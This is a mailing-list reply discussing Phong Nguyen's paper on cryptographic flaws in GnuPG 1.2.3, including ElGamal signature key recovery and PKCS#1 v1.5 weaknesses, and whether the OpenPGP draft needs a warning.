Mike Markowitz wrote:
Folks:
Since Hal just pointed to an RSA Conference paper, I thought I'd bring attention
to an OpenPGP-related paper to be presented by Phong Nguyen at EuroCrypt in May.
A goodly post, although the paper worries
me somewhat on two points, the second of
which may be germane to OpenPGP, further
below.
The abstract sounds like old news, but perhaps list subscribers will be
interested
anyway:
http://www.di.ens.fr/~pnguyen/pub.html#Ng04
Abstract: More and more software use cryptography. But how can one know if
what is implemented is good cryptography? For proprietary software, one
cannot say much unless one proceeds to reverse-engineering, and history
tends to show that bad cryptography is much more frequent than good
cryptography there. Open source software thus sounds like a good solution,
but the fact that a source code can be read does not imply that it is
actually read, especially by cryptography experts. In this paper, we
illustrate this point by
Having read the paper here:
ftp://ftp.di.ens.fr/pub/users/pnguyen/Eurocrypt04.ps
(at least the non heavy-crypto parts), I
think the above half-abstract is unsupported,
and probably disproven by the existence of
the paper itself.
As the paper presents no information on
anything about "good/bad cryptography"
and/or "open source" and/or "proprietary
software" and/or "reverse engineering",
it seems an out of place comment?
(As is the first paragraph of the paper
proper.)
In essence, the existence of GPG as an
open source crypto system has permitted
the author to examine the software and
find some potentially useful flaws. That
would seem to be evidence to the contrary
of the point claimed above?
> examining the case of a basic Internet application
of cryptography: secure email. We analyze parts of the source code of the
latest version of GNU Privacy Guard (GnuPG or GPG), a free open source
alternative to the famous PGP software, compliant with the OpenPGP standard,
and included in most GNU/Linux distributions such as Debian, MandrakeSoft,
Red Hat and SuSE. We observe several cryptographic flaws in GPG v1.2.3. The
most serious flaw has been present in GPG for almost four years: we show
that as soon as one (GPG-generated) ElGamal signature of an arbitrary
message is released, one can recover the signer's private key in less than a
second on a PC. As a consequence, ElGamal signatures and the so-called
ElGamal sign+encrypt keys have recently been removed from GPG. Fortunately,
ElGamal was not GPG's default option for signing keys.
This part and the paper proper looks useful!
I recall the ElGamal signing keys are already
deprecated.
The paper also makes some comments concerning
OpenPGP weaknesses (sans exploits) of PKCS#1 v1.5
RSA encryption and signatures (section 4.2, 4.3).
4.2 Encryption
As already mentioned in Section 2, GPG implements
RSA encryption as defined by PKCS#1 v1.5. This is
not state-of-the-art cryptography: like with
ElGamel, Bleichenbacker's chosen-ciphertext [4]
can decrypt any ciphertext. But, as mentioned
in 3.3, the relevance of such attacks to the email
world is debatable, in part because of the high
number of oracle calls. We hope that future
versions of the OpenPGP standard, will recommend
better RSA encryption standards (see for instance
PKCS#1 v2.1 [20] or NESSIE [8]).
Any comments?
Presumably it is way too late in the piece to
change these methods. My question here would be
more along the lines of whether a warning comment
should be placed in the draft document?
(Apologies for not proposing the text for that!)
iang
PS: definately worth posting though.
[4] D. Bleichenbacker. Generating ElGamal signatures
without knowing the secret key. In _Proc. of Eurocrypt
'96_, volume 1070 of LNCS, pages 10-18. IACR, Springer-
Verlag, 1996.